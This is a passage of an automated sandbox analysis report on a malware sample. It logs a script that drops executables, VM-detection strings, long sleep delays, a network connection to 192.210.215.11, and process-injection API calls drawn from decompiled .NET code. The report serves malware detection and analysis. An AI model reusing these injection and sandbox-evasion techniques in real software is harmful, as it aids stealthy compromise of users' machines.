Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593019
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 592609
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 592156
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591984
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591855
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591734
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591625
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591499
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591357
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591249
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599874
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599646
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599536
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599407
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599282
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599157
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598981
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598858
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596360
Source: wscript.exe, 00000000.00000003.1753041441.0000029C2798D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1758288755.0000029C2798D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757238033.0000029C2798D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: wscript.exe, 00000000.00000003.1749831014.0000029C28291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1753495608.0000029C2908B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746276493.0000029C2889A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1755437701.0000018F0E9E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1759276626.0000018F1000A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1760246545.0000018F0F3E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "ZKMEMEYQEMUJ!...........!k
Source: wscript.exe, 00000000.00000003.1753041441.0000029C2798D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1758288755.0000029C2798D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1758185244.0000029C2793B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1753041441.0000029C27936000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757238033.0000029C2798D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1758758229.0000029C2952B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: wscript.exe, 00000001.00000003.1785564260.0000018F0DA09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wZKMEMEYQEMUJqIl
Source: Service.exe, 0000001D.00000002.2959658018.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: PbsonX.exe.1.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 192.210.215.11 80 Jump to behavior
.NET source code references suspicious native API functions
Source: 2.2.PbsonX.exe.2759510.0.raw.unpack, reflect.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 2.2.PbsonX.exe.2759510.0.raw.unpack, reflect.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 2.2.PbsonX.exe.2759510.0.raw.unpack, reflect.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 620000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 580000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 1B0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 160000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Memory written: C:\Users\user\AppData\Local\Temp\PbsonX.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 500000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MKLTPZ.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Process created: C:\Users\user\AppData\Local\Temp\PbsonX.exe "C:\Users\user\AppData\Local\Temp\PbsonX.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
